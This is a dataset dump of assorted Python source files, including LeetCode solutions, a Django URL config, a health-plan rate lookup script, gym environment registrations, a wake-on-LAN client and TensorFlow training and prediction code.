controller_state.getContext().getId()))\n\n # XXX: Is there a better way to check this?\n if not action_url.startswith('string:'):\n action_url = 'string:%s' % (action_url,)\n return RedirectTo.RedirectTo(action_url)(controller_state)\n\nregisterFormAction('redirect_to_action',\n factory,\n 'Redirect to the action specified in the argument (a TALES expression) for the current context object (e.g. 
string:view)')\n","sub_path":"Products/CMFFormController/Actions/RedirectToAction.py","file_name":"RedirectToAction.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"329579092","text":"class Solution:\n def minWindow(self, s, t):\n start = 0\n minimum = float('inf')\n min_start = 0\n n = len(s)\n required = [0 for i in range(52)]\n present = [0 for i in range(52)]\n for j in t:\n required[ord(j) - ord('a')] += 1\n i = count = 0\n while i < n:\n present[ord(s[i]) - ord('a')] += 1\n if present[ord(s[i]) - ord('a')] <= required[ord(s[i]) - ord('a')]:\n count += 1\n if count == len(t):\n while present[ord(s[start])-ord('a')] > required[ord(s[start])-ord('a')] or required[ord(s[start])-ord('a')] == 0:\n present[ord(s[start]) - ord('a')] -= 1\n start += 1\n if minimum > i-start+1:\n minimum = i-start+1\n min_start = start\n i += 1\n\n return s[min_start : min_start+minimum]\n\nrr = Solution()\nprint(rr.minWindow(\"ADOBECODEBANC\", \"ABC\"))\n","sub_path":"Hashing/minimum-window-substring.py","file_name":"minimum-window-substring.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"2343907","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n\tpath('', views.PostList.as_view()),\n\tpath('post//', views.PostDetail.as_view()), # api/v1/instagram/1\n\tpath('users/', views.UserList.as_view()),\n\tpath('/', views.UserDetail.as_view())\n]","sub_path":"instagram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"569806808","text":"\nimport optuna\nimport joblib\nimport pandas as pd\n\nfrom ..config import *\nfrom Opt import Opt\n\n\n\nclass model:\n def __init__(self):\n self.model = self.read_model(MODEL_PATH)\n self.data = None\n self.processed_data = None\n self.best_parameters = None\n\n def read_model(self, path):\n return joblib.load(path)\n\n def feed_storage(self, data: pd.DataFrame):\n self.data = data\n return self.data\n\n def process_data(self):\n df = self.data\n df[ZMIENNA_CZASU] = pd.to_datetime(df[ZMIENNA_CZASU])\n df = df.set_index(ZMIENNA_CZASU)\n df = df.resample(f'{RESAMPLE_TIME}S').mean()\n df = df.dropna().reset_index()\n df[f'{ZMIENNA_CELU}_train'] = df[ZMIENNA_CELU]\n df = df.set_index([ZMIENNA_CZASU, ZMIENNA_CELU])\n for col in df.columns:\n df[f'{col}_diff'] = df[col].diff()\n df[f'{col}_diff_2'] = df[col] - 2 * df[col].shift(1) + df[col].shift(2)\n self.processed_data = df[-1:].reset_index().set_index(ZMIENNA_CZASU).drop(labels=ZMIENNA_CELU, axis=1)\n return self.processed_data\n\n def optimize_parameters(self):\n study = optuna.create_study()\n study.optimize(Opt(model=self.model, processing=self.processed_data, X=self.data).objective, timeout=1)\n self.best_parameters = study.best_params\n return self.best_parameters","sub_path":"app/model/opt_model.py","file_name":"opt_model.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"440002493","text":"from collections import OrderedDict\nimport sqlite3\nfrom sqlite3 import Error\nimport collections\nimport csv\n\nzipcode_state_rate_area = OrderedDict()\n''' I turned csv into .db file with DB Browser for SQLite, it's a simple program to review .db files. 
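# A quick check of the minWindow solution earlier above: the smallest window
# of "ADOBECODEBANC" that covers all of "ABC" is "BANC", found once the left
# pointer has shrunk past "ODE" after the final 'C' arrives:
assert Solution().minWindow("ADOBECODEBANC", "ABC") == "BANC"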
It was more \n convenient for me to work on .db with SQLite, I hope it's okay.\n plans.csv ==> plans.db\n slcsp.csv ==> slcsp.db\n zips.csv ==> zips.db \n'''\n\ndef create_connection(db_file):\n try:\n conn = sqlite3.connect('{}.db'.format(db_file), timeout=1000)\n return conn\n except Error as e:\n print(e)\n return None\n\n\ndef read_zips():\n zips = []\n connection = create_connection('slcsp')\n c = connection.cursor()\n zipcodes = c.execute(\"\"\"SELECT zipcode FROM slcsp\"\"\") # Reading necessary zip codes...\n for each in zipcodes:\n zips.append(each[0])\n return zips\n\n'''In this function, we are getting the necessary info for each zipcode to compare in plans...'''\n\ndef get_zips():\n zips = read_zips()\n connection = create_connection('zips')\n c = connection.cursor()\n for each in zips:\n\n # Pulling the zipcode, state, rate_area, name. We'll need some of them in next function..\n\n data = c.execute(\"\"\"SELECT zipcode, state, rate_area, name FROM zips WHERE zipcode=?\"\"\", (each,))\n for every in data:\n #print(every[0], every[1], every[2], every[3])\n\n '''\n If zipcode is already exists in our dictionary check whether if its rate_area is same or not...\n So, if it is not same, we cannot (or shouldn't) calculate the SLCSP according to description...\n '''\n\n if every[0] in zipcode_state_rate_area:\n try:\n if every[2] != zipcode_state_rate_area[every[0]]['rate_area']:\n zipcode_state_rate_area[every[0]] = {'rate_area' :None, 'state' :None}\n except: continue\n\n '''If zipcode is not in our dictionary, then append it with rate_area and state...'''\n else:\n zipcode_state_rate_area[every[0]] = {'rate_area' :every[2], 'state' :every[1]}\n search(zipcode_state_rate_area)\n\n'''In this function, we are getting the rate for each zipcode. SQL statement doing the most of the job.'''\n\ndef search(info):\n final_dict = OrderedDict()\n\n for each in info.items():\n num = 0\n final_dict[each[0]] = {'rate': ''}\n print(each[0])\n\n '''\n If rate_area is None, it means it cannot be determined according to description. So, we only want the ones\n where we can determine the rate of zipcode. BUT I'm appending all zipcodes and rates to final_dict before \n proceed any further. Because, we want to leave blank the rate of zipcode whose rate cannot be determined...\n '''\n\n if each[1]['rate_area'] != None:\n connection = create_connection('plans')\n c = connection.cursor()\n\n '''\n As we are calculating the Silver plan, I want metal_level to be 'Silver'. I ordered them since I want to get\n second lowest and limited it with 2.\n '''\n\n data = c.execute(\"\"\"SELECT state, metal_level, rate_area, rate FROM plans WHERE state=? AND rate_area=? AND\n metal_level='Silver' ORDER BY rate ASC LIMIT 2\"\"\", (each[1]['state'], each[1]['rate_area'],))\n\n '''\n Some of zipcodes have only one Silver plan, we cannot determine the second lowest. So, I'm checking if it \n has silver plans more than 1. 
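# The docstring above converts plans.csv / slcsp.csv / zips.csv to .db files
# by hand in DB Browser; a scripted equivalent is sketched below (assumptions:
# each CSV's first row is a header, and each table is named after its file,
# which is what the SELECT ... FROM slcsp / zips / plans queries here expect):
import csv
import sqlite3

def csv_to_db(name):
    conn = sqlite3.connect('{}.db'.format(name))
    with open('{}.csv'.format(name), newline='') as f:
        rows = csv.reader(f)
        header = next(rows)
        conn.execute('CREATE TABLE IF NOT EXISTS {} ({})'.format(name, ', '.join(header)))
        conn.executemany('INSERT INTO {} VALUES ({})'.format(name, ', '.join('?' * len(header))), rows)
    conn.commit()
    conn.close()

for name in ('plans', 'slcsp', 'zips'):
    csv_to_db(name)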
If so, we can get the second one, if not, leave it as None.\n '''\n\n for every in data:\n num += 1\n if num == 2:\n zipcode = each[0]\n final_dict[zipcode] = {'rate' :every[3]}\n\n '''Finally, appending the zipcodes and rates to .csv file...'''\n\n with open('final.csv', 'w') as w:\n writer = csv.DictWriter(w, ['zipcode', 'rate'], lineterminator='\\n')\n writer.writeheader()\n for zipcode, rate in final_dict.items():\n writer.writerow({'zipcode': zipcode, 'rate': rate['rate']})\n\n\nif __name__ == \"__main__\":\n get_zips()","sub_path":"SLCSP.py","file_name":"SLCSP.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"609090949","text":"import os\nimport inspect\nimport sys\n\nimport pytest\n\nimport bmds\n\n\n@pytest.fixture\ndef dataset():\n return bmds.ContinuousDataset(\n doses=[0, 10, 50, 150, 400],\n ns=[111, 142, 143, 93, 42],\n responses=[2.112, 2.095, 1.956, 1.587, 1.254],\n stdevs=[0.235, 0.209, 0.231, 0.263, 0.159])\n\n\ndef test_executable_path():\n\n parents = (\n bmds.Dichotomous,\n bmds.DichotomousCancer,\n bmds.Continuous,\n )\n\n for name, obj in inspect.getmembers(bmds):\n if inspect.isclass(obj):\n if obj not in parents and issubclass(obj, parents):\n exe = obj.get_exe_path()\n print(obj.__name__, exe)\n assert os.path.exists(exe)\n\n\n@pytest.mark.skipif(sys.platform != \"win32\",\n reason='BMDS can only be executed on Windows')\ndef test_execute(dataset):\n model = bmds.Logistic_213(dataset)\n model.execute()\n assert model.output_created is True\n","sub_path":"tests/test_execution.py","file_name":"test_execution.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"593184531","text":"from gym.envs.registration import register \nfrom gym import make\n\nLEVELS = ['lt_chasm', 'lt_hallway_slope', 'lt_horseshoe_color', 'lt_space_bounce_hard', \\\n'nav_maze_random_goal_01','nav_maze_random_goal_02', 'nav_maze_random_goal_03', 'nav_maze_random_goal_01_no_apples', 'nav_maze_random_goal_02_no_apples', 'nav_maze_static_01', \\\n'nav_maze_static_02', 'seekavoid_arena_01', 'stairway_to_melon', 'generated_maze_dense', 'generated_maze_sparse', 'generated_maze_no', 'generated_maze_sparse_rand', 'generated_maze_sparse_new_spawn',\n'generated_maze_dense_new_spawn', 'generated_maze_no_new_spawn', 'proc_gen_maze_sparse', 'proc_gen_maze_dense', 'proc_gen_maze_no', 'human_gen_maze_train']\n\nTEST_SUFFIXES = ['NEW', 'NEW4', 'NEWA', 'NEW4A', 'NEWno', 'NEW4no', 'NEWb', 'NEW4b', 'NEWA_DENSER', 'NEW4A_DENSER', 'NEWno_densest']\n\nfor rew_type in ['dense', 'sparse', 'no']:\n for i in range(1, 11):\n LEVELS.append(\"{}_reward_gen_maze_{}\".format(rew_type, i))\n\nfor rew_type in ['dense', 'sparse', 'no']:\n for i in range(20):\n LEVELS.append(\"validation_maze_{}_{}\".format(rew_type, i))\nLEVELS.append(\"dense_reward_gen_maze_155\")\nLEVELS.append(\"dense_reward_gen_maze_156\")\nLEVELS.append(\"human_gen_maze_100\")\nfor i in TEST_SUFFIXES:\n LEVELS.append(\"naren_manual_eliza_{}\".format(i))\nfor i in range(1,6):\n LEVELS.append(\"naren_manual_eliza_NEW4_var{}\".format(i))\n LEVELS.append(\"naren_manual_eliza_NEW4A_var{}\".format(i))\n LEVELS.append(\"naren_manual_eliza_NEW_var{}\".format(i))\n LEVELS.append(\"naren_manual_eliza_NEWA_var{}\".format(i))\n\nfor i in range(200):\n LEVELS.append(\"human_gen_maze_{}\".format(i))\n\nfor i in range(100):\n 
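# The SLCSP selection rule from the script above, restated as a compact
# sketch (rates are illustrative): with one rate area's silver rates sorted
# ascending, an SLCSP exists only when at least two plans come back.
def second_lowest(rates):
    rates = sorted(rates)
    return rates[1] if len(rates) >= 2 else None

assert second_lowest([245.20, 197.30, 285.69]) == 245.20
assert second_lowest([197.30]) is None   # a single silver plan: leave the rate blank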
LEVELS.append(\"proc_gen_test_maze_{}_fixed\".format(i))\n LEVELS.append(\"proc_gen_train_maze_{}\".format(i))\n\nfor i in [2,3,4,8,9,10]:\n LEVELS.append(\"Maze{}E\".format(i))\n LEVELS.append(\"Maze{}E_A\".format(i))\n LEVELS.append(\"Maze{}E_NO\".format(i))\n\nfor rew_type in ['dense', 'sparse', 'no']:\n for i in range(20):\n LEVELS.append(\"validation_maze_{}_{}\".format(rew_type, i))\n \ndef _to_pascal(text):\n return ''.join(map(lambda x: x.capitalize(), text.split('_')))\n \nMAP = { _to_pascal(l):l for l in LEVELS }\n\nfor key, l in MAP.items():\n register(\n id='DeepmindLab%s-v0' % key ,\n entry_point='gym_deepmindlab.env:DeepmindLabEnv',\n kwargs = dict(scene = l)\n )\n #print('DeepmindLab%s-v0' % key)\n register(\n id='DeepmindLab%sWithDepth-v0' % key,\n entry_point='gym_deepmindlab.env:DeepmindLabEnv',\n kwargs = dict(scene = l, colors = 'RGBD_INTERLEAVED')\n )\n #print('DeepmindLab%sWithDepth-v0' % key)\n","sub_path":"gym_deepmindlab/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"619423704","text":"# -*- coding=utf8 -*-\n# !/usr/bin/python3\nimport socket\nimport json\nimport struct\n\n\ndef WOL(mac_address):\n if len(mac_address) == 12:\n pass\n elif len(mac_address) == 12 + 5:\n sep = mac_address[2]\n mac_address = mac_address.replace(sep, '')\n else:\n raise ValueError('Incorrect MAC address format')\n data = ''.join(['FFFFFFFFFFFF', mac_address * 16])\n send_data = b''\n for i in range(0, len(data), 2):\n byte_dat = struct.pack('B', int(data[i: i + 2], 16))\n send_data = send_data + byte_dat\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sock.sendto(send_data, ('255.255.255.255', 7))\n sock.close()\n\n\nif __name__ == '__main__':\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # client.connect(('10.201.3.77', 37776))\n client.connect(('104.224.159.162', 37776))\n login_msg = b'{\"cmd\":\"login\",\"clientId\":\"client1\"}'\n client.sendall(login_msg)\n\n result = str(client.recv(1024), 'UTF-8')\n while result is not None and result != '':\n print('接收到服务端指令:', result)\n try:\n msg = json.loads(result)\n if msg['cmd'] == 'wol':\n mac = msg['mac']\n WOL(mac)\n else:\n print('未知指令:', result)\n except:\n print('未知指令:', result)\n finally:\n result = str(client.recv(1024), 'UTF-8')","sub_path":"socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"543982752","text":"import glob\r\nimport os.path\r\nimport random\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport Student_nets as student_net\r\nfrom tensorflow.python.platform import gfile\r\nfrom tensorflow.python.ops import array_ops\r\nimport os\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------\r\ndef read_image(path, num_per):\r\n train_data = []\r\n train_lable = []\r\n\r\n train_datas = []\r\n train_lables = []\r\n lables=[]\r\n\r\n roi = open(path) \r\n roi_path = roi.readlines()\r\n classnum = len(roi_path)//num_per\r\n trainnum = 0\r\n testnum = 0\r\n i = 0\r\n for i,image_list in enumerate(roi_path):\r\n if i % num_per < num_per/2:\r\n train_datas.append(image_list[:-1])\r\n train_lables.append(int(i/num_per))\r\n trainnum = trainnum +1\r\n lables=train_lables\r\n train_lable = 
np.zeros([trainnum, classnum], np.int64)\r\n\r\n i = 0\r\n for label in train_lables:\r\n train_lable[i][label] = 1\r\n i = i + 1\r\n\r\n print(trainnum,classnum)\r\n train_lables = train_lable.reshape([trainnum*classnum])\r\n\r\n return train_datas,train_lables\r\n#-----------------------------------------------------------------------------------------------------------------------\r\ndef Hash_loss(feature,label_batch,batch_size,omega_size):\r\n archer_feature,sabor_feature = tf.split(feature,[omega_size,batch_size-omega_size],axis = 0)\r\n archer_label,sabor_label = tf.split(label_batch,[omega_size,batch_size-omega_size],axis = 0)\r\n archer_matrix = tf.matmul(archer_feature,tf.transpose(archer_feature))\r\n sabor_matrix = tf.matmul(sabor_feature,tf.transpose(sabor_feature))\r\n\r\n archer_Similarity = tf.matmul(archer_label,tf.transpose(archer_label))\r\n sabor_Similarity = tf.matmul(archer_label,tf.transpose(sabor_label))\r\n archer_diag = tf.transpose(tf.reshape(tf.tile(tf.diag_part(archer_matrix),[omega_size]),[omega_size,omega_size]))\r\n archer_sabor_diag = tf.transpose(tf.reshape(tf.tile(tf.diag_part(archer_matrix),[batch_size-omega_size]),[batch_size-omega_size,omega_size]))\r\n sabor_diag = tf.reshape(tf.tile(tf.diag_part(sabor_matrix),[omega_size]),[omega_size,batch_size-omega_size])\r\n\r\n archer_distance = archer_diag + tf.transpose(archer_diag) - 2*archer_matrix\r\n sabor_distance = sabor_diag + archer_sabor_diag - 2*tf.matmul(archer_feature,tf.transpose(sabor_feature))\r\n archer_loss = tf.reduce_mean(1/2*archer_Similarity*archer_distance + 1/2*(1-archer_Similarity)*tf.maximum(180-archer_distance,0))\r\n sabor_loss = tf.reduce_mean(1/2*sabor_Similarity*sabor_distance + 1/2*(1-sabor_Similarity)*tf.maximum(180-sabor_distance,0))\r\n hash_loss = archer_loss + sabor_loss\r\n\r\n return hash_loss,archer_distance,sabor_distance\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------\r\nbatch_size = 20\r\nomega_size = 10\r\ncapacity=1000+3*batch_size\r\n\r\ndef main():\r\n tf.reset_default_graph()\r\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\" \r\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.70)\r\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\r\n \r\n logs_train_dir = './save_student/model.ckpt'\r\n path = 'SF.txt'\r\n num_per = 10\r\n train_data,train_label = read_image(path, num_per)\r\n train_size=len(train_data)\r\n batch, label = get_batch(train_data, train_label,train_size,batch_size,capacity,True)\r\n \r\n global_step = tf.Variable(0,trainable = False,name = \"global_step\")\r\n opt = tf.train.RMSPropOptimizer(0.001,0.9)\r\n\r\n feature_s1 = student_net.encode1(batch, False, False, scope_name = 'student1')\r\n feature_s2 = student_net.encode2(feature_s1, False, False, scope_name = 'student2')\r\n feature_s3 = student_net.encode3(feature_s2, False, False, scope_name = 'student3')\r\n feature_s4 = student_net.encode4(feature_s3, False, False, scope_name = 'student4')\r\n code = tf.sign(feature_s4)\r\n\r\n hash_loss, _, _ = Hash_loss(feature_s4, label, batch_size, omega_size)\r\n q_loss = tf.reduce_mean(tf.pow(tf.subtract(feature_s4, code), 2.0))\r\n DHN_loss = hash_loss+ 0.5*q_loss\r\n \r\n all_vars = tf.trainable_variables()\r\n t_vars = [var for var in all_vars if 'student' in var.name]\r\n \r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n 
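# Hash_loss above assembles pairwise squared Euclidean distances from Gram
# matrices with the tile/diag trick; the identity it relies on, written in
# NumPy for clarity (shapes are illustrative only):
import numpy as np

F = np.random.randn(5, 8)        # 5 feature vectors of length 8
K = F @ F.T                      # Gram matrix, K[i, j] = <f_i, f_j>
dist = np.diag(K)[:, None] + np.diag(K)[None, :] - 2 * K
brute = ((F[:, None, :] - F[None, :, :]) ** 2).sum(axis=-1)
assert np.allclose(dist, brute)  # d_ij = K_ii + K_jj - 2*K_ij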
optimizer = opt.minimize(DHN_loss,global_step = global_step, var_list = t_vars)\r\n\r\n sess.run(tf.global_variables_initializer()) \r\n saver = tf.train.Saver(t_vars,max_to_keep=0)\r\n\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n steps=int(len(train_data)/batch_size)\r\n epoch=500\r\n count=0000\r\n print('start train_bottle')\r\n try:\r\n for e in range(epoch):\r\n if coord.should_stop():\r\n break\r\n for step in range(steps): \r\n count=count+1\r\n _, loss_= sess.run([optimizer,DHN_loss])\r\n if( (count)%10 == 0):\r\n print(\"After %d epoch %d training step(s),the loss is %g.\" % (e, count, loss_))\r\n if( (count)%10000 == 0):\r\n saver.save(sess,logs_train_dir,global_step=count)\r\n except tf.errors.OutOfRangeError:\r\n print('Done training -- epoch limit reached')\r\n finally:\r\n coord.request_stop()\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------\r\ndef get_batch(image, label,label_size,batch_size, Capacity,Shuffle):\r\n \r\n classnum=len(label)//len(image)\r\n image = tf.cast(image, tf.string)\r\n label = tf.convert_to_tensor(label,tf.int64)\r\n label = tf.reshape(label,[label_size,classnum])\r\n \r\n input_queue = tf.train.slice_input_producer([image, label],shuffle = Shuffle,capacity = Capacity)\r\n label = input_queue[1]\r\n image_contents = tf.read_file(input_queue[0])\r\n image = tf.image.decode_jpeg(image_contents, channels=3)\r\n image = tf.image.resize_images(image, [224, 224])\r\n \r\n image_batch,label_batch = tf.train.batch([image,label],batch_size= batch_size,num_threads= 1, capacity = Capacity)\r\n \r\n label_batch = tf.cast(label_batch, tf.float32)\r\n image_batch = tf.cast(image_batch, tf.float32)\r\n \r\n return image_batch, label_batch\r\n#-----------------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"train_student.py","file_name":"train_student.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"455914697","text":"import os, glob\nimport numpy as np\nfrom skimage.io import imread, imsave, imshow\nfrom PIL import Image, ImageTk\nfrom tqdm.notebook import trange\nfrom core.imageprep import create_crop_idx, crop_to_patch, construct_from_patch, create_crop_idx_whole\nimport time\n\nimport matplotlib.pyplot as plt\n\ndef stack_predict(input_imgpath, \n output_imgpath, \n cropidx, \n model, \n rescale = None,\n patch_size = (256, 256), \n predict_threshold = 0.5):\n \n IMG_HEIGHT = patch_size[0]\n IMG_WIDTH = patch_size[1]\n \n for idx in trange(len(input_imgpath)):\n \n inputimg = input_imgpath[idx]\n \n # load image\n img_tmp = imread(inputimg)\n \n # process rescale\n if rescale is not None: \n img_tmp = img_tmp * rescale \n \n # crop the image\n outputimg_tmp = crop_to_patch(img_tmp, cropidx, (IMG_HEIGHT, IMG_WIDTH))\n outputimg_tmp_re = np.reshape(outputimg_tmp, (outputimg_tmp.shape[0], \n outputimg_tmp.shape[1], \n outputimg_tmp.shape[2], 1))\n \n # push the crop images into the model\n img_predict_stack = model.predict(outputimg_tmp_re, batch_size = 16, \n # verbose = 1\n )\n \n outputimg = construct_from_patch(img_predict_stack, \n cropidx, \n target_size = (img_tmp.shape[0], img_tmp.shape[1]))\n \n # threshold the image\n outputimg_T = outputimg > predict_threshold\n \n # save image\n outputimg_T_pillow = 
Image.fromarray(outputimg_T)\n outputimg_T_pillow.save(os.path.join(output_imgpath, os.path.basename(inputimg)))\n\ndef stack_predict_v2(input_imgpath, \n output_imgpath, \n cropidx, \n model, \n rescale = None,\n patch_size = (256, 256),\n predict_threshold = 0.5):\n \n size_factor = 32\n \n IMG_HEIGHT = patch_size[0]\n IMG_WIDTH = patch_size[1]\n \n for idx in trange(len(input_imgpath)):\n \n inputimg = input_imgpath[idx]\n \n # load image\n img_tmp = imread(inputimg)\n \n img_height = img_tmp.shape[0]\n img_width = img_tmp.shape[1]\n \n # process rescale\n if rescale is not None: \n img_tmp = img_tmp * rescale \n \n # predict main region\n \n \n img_tmp_crop = img_tmp[:img_tmp.shape[0]//size_factor * size_factor, :img_tmp.shape[1]//size_factor * size_factor]\n img_tmp_crop = img_tmp_crop.reshape(1, img_tmp_crop.shape[0], img_tmp_crop.shape[1], 1)\n \n start = time.time()\n img_tmp_crop_predict_main = model.predict(img_tmp_crop, batch_size = 16)\n end = time.time()\n print('time for main: {}'.format(end-start))\n \n img_tmp_crop_predict_main = img_tmp_crop_predict_main.reshape(img_tmp_crop_predict_main.shape[1],\n img_tmp_crop_predict_main.shape[2])\n \n print(img_tmp_crop_predict_main.shape)\n \n \n ## predict the edge\n start = time.time()\n edge_patch = crop_to_patch(img_tmp, cropidx, (IMG_HEIGHT, IMG_WIDTH))\n edge_patch_re = np.reshape(edge_patch, (edge_patch.shape[0], \n edge_patch.shape[1], \n edge_patch.shape[2], 1))\n \n start = time.time()\n edge_patch_re_predict = model.predict(edge_patch_re, batch_size = 16)\n end = time.time()\n print('time for edge: {}'.format(end-start))\n print(edge_patch_re_predict.shape)\n \n img_tmp_crop_predict_edge = construct_from_patch(edge_patch_re_predict, \n cropidx, \n target_size = (img_height, img_width))\n \n # average\n outputimg_stack = np.full((2, img_height, img_width), np.nan)\n outputimg_stack[0, :img_tmp_crop_predict_main.shape[0], :img_tmp_crop_predict_main.shape[1]] = img_tmp_crop_predict_main\n \n img_tmp_crop_predict_edge_na = img_tmp_crop_predict_edge\n img_tmp_crop_predict_edge_na[:img_height - IMG_HEIGHT, :img_width - IMG_WIDTH] = np.nan\n outputimg_stack[1, :, :] = img_tmp_crop_predict_edge\n \n outputimg = np.nanmean(outputimg_stack, axis = 0)\n \n # outputimg_T = outputimg\n \n # threshold the image\n outputimg_T = outputimg > predict_threshold\n \n \n # save image\n outputimg_T_pillow = Image.fromarray(outputimg_T)\n outputimg_T_pillow.save(os.path.join(output_imgpath, os.path.basename(inputimg)))\n \n ","sub_path":"core/train_predict.py","file_name":"train_predict.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"570117643","text":"# https://leetcode.com/explore/interview/card/top-interview-questions-medium/103/array-and-strings/776/\n# https://leetcode.com/problems/3sum/description/\n\n# 3Sum\n#\n# Given an array nums of n integers, are there elements a, b, c in\n# nums such that a + b + c = 0? 
Find all unique triplets in the array\n# which gives the sum of zero.\n\nimport collections\nimport unittest\n\n\nclass Solution:\n \n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n return self.three_sum3(nums)\n\n # Note: for each num, do 2sum (from left/right) for remaining data.\n #\n # - sort A first\n # - for each starting position i, do 2sum 2 pointer (left/right)\n # search from i+1 to end of array.\n # - since array is sorted, we can do the 2sum in O(n) time by\n # scanning left/right to the center until they meet.\n # left++ if 3sum is < target\n # right-- if 3sum is > target\n # if equal, add result, and skip any left/right that are the same.\n # - no need to use a set/etc to track the return result, if we can\n # ensure we only add unique data.\n #\n # Don't need to search prior to i, since any found match would've\n # been found earlier (when i was at that position).\n\n # based on a guy's java solution, damn it damn it damn it!\n # more optimized/easier to read based on a python guy's post.\n #\n # don't need to create a set/hashtable, just use 2 pointer 2sum search\n # 313 / 313 test cases passed.\n # Status: Accepted\n # Runtime: 1076 ms (beats 40.01% of py3)\n # Runtime: 1004 ms (beats 48.81% of py3)\n def three_sum3(self, A):\n n = len(A)\n A.sort()\n res = []\n for i in range(0, n-2): # i: starting pos of all 3-tuple\n if i > 0 and A[i] == A[i-1]: # skip if same as last one\n continue\n l, r = i+1, n-1 # left/right pointer (all after i)\n while l < r:\n s = A[i] + A[l] + A[r] # calculate current sum of 3 items\n if s < 0: # if less, advance left pointer (i remains unchanged)\n l += 1\n elif s > 0: # if more, advance right pointer (i remains unchanged)\n r -= 1\n else: # equals target 0, add tuplet, and skip left/right that are the same\n res.append([A[i], A[l], A[r]]) # sorted so unique\n while l < r and A[l] == A[l+1]: # advance left if same\n l += 1\n while l < r and A[r] == A[r-1]: # decrease right if same\n r -= 1\n l += 1 # advance left/right pointer for next round\n r -= 1\n return res\n\n\n# what I came up with... 
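# A quick check of the two-pointer three_sum3 above on the problem's
# canonical example (the input gets sorted, so triplets come out ordered
# with duplicates skipped on both pointers):
s = Solution()
assert s.threeSum([-1, 0, 1, 2, -1, -4]) == [[-1, -1, 2], [-1, 0, 1]]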
for each i, 2sum remaining items\nclass SolutionMe:\n\n # still time limited exceeded??\n def three_sum2(self, A):\n\n if not A: # if no input\n return []\n n = len(A)\n if n < 3: # or less than 3 elements\n return []\n retval = set()\n\n # A.sort() # we sort A first\n counter = collections.Counter(A) # build freq chart\n\n # create new array\n B = []\n for c in counter:\n for i in range(counter[c]):\n B.append(c)\n\n for i in range(n):\n for j in range(i+1, n):\n a = B[i]\n b = B[j]\n counter[a] -= 1\n counter[b] -= 1\n x = a + b\n y = 0 - x\n if y in counter and counter[y] > 0:\n retval.add(tuple(sorted([a, b, y])))\n counter[a] += 1\n counter[b] += 1\n return list(retval)\n\n # 123 / 313 test cases passed, wrong answer, hmmm\n # 311 / 313 test cases passed, time limit exceeded, hehe\n # still time limit exceeded after not creating sets each time\n def three_sum1(self, A):\n\n if not A: # if no input\n return []\n n = len(A)\n if n < 3: # or less than 3 elements\n return []\n\n A.sort() # we sort A first\n counter = collections.Counter(A) # build freq chart\n\n retval = set()\n last = None\n\n # for each element, reduce to 2 sum\n for i in range(n):\n v = A[i]\n if v == last: # skip if same as last one looked at\n continue\n last = v\n # rest = A[:i] + A[i+1:] # array without this element\n rest = A[i+1:] # rest of array, no need to look prior\n counter[v] -= 1 # remove v from frequency table\n pairs = self.two_sum(rest, 0-v, counter)\n for p in pairs:\n retval.add(tuple(sorted([v, p[0], p[1]])))\n counter[v] += 1 # restore v in frequency table\n\n return list(retval)\n\n def two_sum(self, A, target, counter):\n \"\"\"Return ALL the tuple that sums to target\"\"\"\n if not A or len(A) < 2:\n return []\n\n retval = []\n for x in A: # for each value in A\n counter[x] -= 1 # remove x from counter temporarily\n v = target - x # calc the complement\n if v in counter and counter[v] > 0: # if have complement\n retval.append([x, v]) # add tuple\n counter[x] += 1 # remove x from counter temporarily\n\n return retval\n\n\nclass Test3Sum(unittest.TestCase):\n\n def setUp(self):\n self.sol = Solution()\n\n def test1(self):\n A = [-1, 0, 1, 2, -1, -4]\n v = self.sol.threeSum(A)\n print(v)\n\n def test2(self):\n A = [-4,-2,-2,-2,0,1,2,2,2,3,3,4,4,6,6]\n v = self.sol.threeSum(A)\n print(v)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"leetcode/2-medium/1-arraystring/1-3sum/3sum.py","file_name":"3sum.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} 